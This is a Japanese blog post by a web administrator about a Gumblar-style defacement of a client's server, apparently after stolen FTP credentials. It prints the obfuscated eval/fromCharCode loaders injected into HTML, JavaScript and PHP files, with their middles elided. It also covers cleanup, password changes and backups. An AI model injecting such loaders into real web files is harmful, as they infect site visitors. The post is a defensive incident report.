WEBサイト改ざん被害

メルです。

かなり仕事を休んでしまったので
「さぁ、仕事!仕事!」と思いきや、
管理しているある企業のサーバーに
不振なFTPアクセスが・・・

アクセス元は、

など・・・。

これはやばいのでは?と思いながら
サーバーの中身を見ると、
なんと大量のファイルが改ざんにあっているではありませんか。

改竄されたページにアクセスすると訪問者のパソコンが
感染し、被害が広まると言うオマケ付き。

改竄されたファイルは、HTMLファイル、JavaScriptファイル、
一部PHPファイルで、<!–81a338–>、/*81a338*/から始まる
JavaScript、iframe などの埋め込みが特徴。

他にも81a338の代わりに0c0896や、ded509などの6桁の
英数字のものもあるようです。

状況から見て、
これは最近非常に被害が増えているパターンで
ガンブラーなどのウイルスやスパイウエアに感染し、
パソコンからFTP情報を搾取され、改竄されている
可能性が高い。

 

 

流石にこれはまずいので、
サイトを閉鎖し、クライアント企業に連絡。

全てのパソコンのウイルスチェックをしてもらい、
サーバー、FTPへのアクセス制限を行い、
全てのパスワードの変更と共に復旧作業に取り掛かることに。

因みに改ざん被害にあったファイルには以下のコードが追加されていました。

 

改ざんされたHTMLファイル

<!--81a338--><script type="text/javascript" language="javascript" >gakqf="s"+"p"+"li"+"t";srkjb=window;fpr="dy";txm=document;rcigwm="0x";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv="17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:6f:58:5c:17:34:17:5b:66:5a:6c
     ・
     ・中略
     ・
5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:6f:58:5c:27:30:1f:20:32:4:1:74:4:1:74"[gakqf](":");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String["fromCharCode"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script><!--/81a338-->

 

改ざんされたJavaScriptファイル

/*81a338*/
ragir="s"+"p"+"li"+"t";negu=window;zwh="dy";vqpoo=document;rauffm="0x";blye=(5-3-1);try{++(vqpoo.body)}catch(xdomas){jioz=false;try{}catch(dhncm){jioz=21;}
if(1){przkl="17:5d:6c:65:5a:6b:60:66:65:17:60:5d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:
     ・
     ・中略
     ・
2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:32:4:1:4:1:60:5d:27:30:1f:20:32:4:1:74:4:1:74"[ragir](":");}negu=przkl;ljy=[];for(cahkv=22-20-2;-cahkv+1374!=0;cahkv+=1){lufim=cahkv;if((0x19==031))ljy+=String["fromCharCode"](eval(rauffm+negu[1*lufim])+0xa-blye);}klc=eval;klc(ljy)}
/*/81a338*/

 

改ざんされたPHPファイル

#81a338#
if(empty($qk)) {
$qk = "<script type=\"text/javascript\" language=\"javascript\" >gakqf=\"s\"+\"p\"+\"li\"+\"t\";srkjb=window;fpr=\"dy\";txm=document;rcigwm=\"0x\";kguirj=(5-3-1);try{++(txm.body)}catch(yymj){jpi=false;try{}catch(vji){jpi=21;}
if(1){crqv=\"17:5d:6c:65:5a:6b:60:66:65:17:6f:58:5c:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:
     ・
     ・中略
     ・
4:1:74:4:1:74\"[gakqf](\":\");}srkjb=crqv;cub=[];for(yghxc=22-20-2;-yghxc+1384!=0;yghxc+=1){mfeuzr=yghxc;if((0x19==031))cub+=String[\"fromCharCode\"](eval(rcigwm+srkjb[1*mfeuzr])+0xa-kguirj);}rzosnt=eval;rzosnt(cub)}</script>";
echo $qk;
}
#/81a338#

 

このサーバーには月商300万円のネットショップが入っていたので
スピード勝負。

結局なんだかんだで復旧までに丸1日かかってしまいましたが(笑

最近、CMSなどの脆弱性をついた攻撃や、
今回のようにパソコンから情報を搾取しての攻撃など、
非常に被害が広まっています。

またWEBサイトにアクセスするだけでも感染するものも
多数あります。

どこか遠い世界の出来事ではなく、
誰もがいつでも感染する可能性があります。

パソコンのセキュリティはしっかりと導入し、
まめにスキャンして、皆さんも気をつけて下さい。

 

 

— 10/3追記 —

 

このタイプの被害にあった場合の対処法は、
81a338で入れ子になっている部分の記述を削除するしかありません。

被害にあっている事に気付くのが遅いと、
数百から数千ものファイルが書き換えられているため、
手動でファイルを開いて削除していたら大変です。
日頃からサーバー内の全ファイルのバックアップを
まめに取っておく事をお勧めします。

バックアップさえあれば、FTPで一括上書きアップロードで対応できます。

 

 

この投稿は役に立ちましたか? 役に立った 役に立たなかった

 

ネットビジネス速報メールマガジン

 

メルのネットビジネス速報では、悪質高額塾などの被害が拡大しないように
新しい悪質販売者の情報が入り次第、速報でお伝えいたします。

Dreamweaver、Fireworks、PhotoshopなどのTipsやチュートリアルの紹介、
最新SEO情報、その他ネットビジネスに関する情報をいち早く配信しています。

お名前(必須)
メールアドレス(必須)

One Response to “WEBサイト改ざん被害”

  1. […] これは前回、WEBサイト改ざん被害の記事でも書きかましたが、 管理しているパソコンからFTPのパスワードを抜き取られて改竄されます。 […]

記事「WEBサイト改ざん被害」にコメントを残す

サブコンテンツ

危険な高額塾

タグ

高速ゲーム 81a338 SyntaxHighlighter 高額塾 @PAGES シャンプー フレンドシップメール メモ 詐欺 ping送信 日本語入力変換ソフト Google Maps API 短縮URLツール 無料 Newpost Catch ネットガレージ ライン ブルートフォースアタック ムーバブルタイプ カスタマイズ google ボタン ライブチャット ランキング PPC Google Maps 株式会社SRシステム 株式会社Free Agent Style レイアウト 原田真 インターネット ツール 関根義光 やしろひろたみ クラウド変換 サンタ LinkShaker wpXサーバー css 上位表示 転売大園塾 自動 ファビコン postpost テンプレート 与沢翼 感染 グラデーション リンクシェイカー 与沢翼×蝶乃舞 インターネットビジネススクール 復元 モザイク ハート DOCTYPE ヤフオク IP MovableTYpe メルマガ配信システム 無断送信 functions.php Internet Explorer プロモーション 比較 大園麗花 スカイプ 三橋美仁 ロリポップ 賢威 ブロックポリシー html MT 管理画面 アフィリエイト 秀吉塾天下統一 クリックランキング アレックス 伊藤 虎太郎 土屋ひろし wordpress ドメイン 定型文 蝶乃舞 Yahoo BBIZ レンタルサーバー マイクロソフト 特定のメールアドレス 固定ページ マルウエア 宮田麗花 掲示板 ネットゲーム 株式会社SRシステム 特権ビジネス 申請金ビジネス PHP クラウド入力機能 バイドゥー DTD 伊藤塾 脆弱性 中山秀人 Ban Hammer 小笠原健一 レビュー CGI WEB ソフト moza KMS認証 ブラシ BUYMA XHTML アフィ匠 ぼかし IBS 加藤 秀吉 レタープレス ヤフーショッピング トレンドアフィリエイト インペリアルゴールド 権利収入 サイト改ざん 伊藤 歩 情報商材 アイコン 不労所得の神 ネオヒルズアカデミー Baidu ブロック tool パズル Tiger-Wing ウイルス 不正アクセス ブラクラ ヤフー ネットビジネス 北川 雅嗣 人物 IE 球体 エディタ 滑らか エキスパートメール 切り抜き CS6 FTP 加工 大西良幸 WP Extension Manager フォローマティック アンダーグラウンドアフィリエイトクラブ ソース ECサイト Adobe コピーボタン 改ざん Thunderbird system 個人情報 株式会社バンザイ getElementByTagName ライオンアフィリエイト wp-login.php 株式会社A-ブログレス アレックス式ネオせどりスクール 優先順位 セキュリティ インフォトップ 株式会社ニュース Firefox スクロール MasterCollection 自己アフィリエイト 村上省吾 新井浩 久積篤史 RSS 背景 Windows 伊藤虎太郎 KMSpico 池田純矢 がら空きビジネス ネットショップ Line バナー ワードプレス 改竄 量産 クロスアフィリエイト ネットビジネス大全集 force puzzle もざ プラグイン 関根塾 山下 個人情報流出 twitter プロファイル YouTube Maniax 2017 SmoothScroll.js 自己アフィリ ウインドウ Youtube 既得権益 画像 マニュアル 秒速で1億円稼ぐ男 Favicon クラック 百度 SKナレッジ Agency Business バックアップ Windows 7 表示 スタイルシート アクセスアップ ネットビジネス最後の楽園 バイマ 大園式転売塾 トラフィック アンダーグラウンドメソッド getElementById 切抜き Chrome インターネットエクスプローラー 配布 ツイッター テーマ 出店料 タスクバー CS5 ビジネス 管理ツール document.all 到達率 ブラウザ Cash on Wordpress 放射線 followmatic Wordpress Content Slide スマホ デスクトップ 立体 explorer 石井匠 詐欺組織 SEO 大園転売塾 レイアウト崩れ Login LockDown 不正送信 FireWorks 音量アイコン ユーチューブマニアクス2017 HTML4.0 ソースコード アドセンス RSS Includes Pages エクスプローラー ping ざくざく君 登録禁止 自動化 android タイガーウイング EC Diamond Affiliate Masters Program トレンドキーワード JavaScript せどり スムーズ High Concept Marketing 流出 無料オファー .htaccess office iphone RMT 短縮URL アクセス制限 株式会社WINGOOD 副業術 やしろ塾 エクスチェンジ

アーカイブ

エステトラブル

このページの先頭へ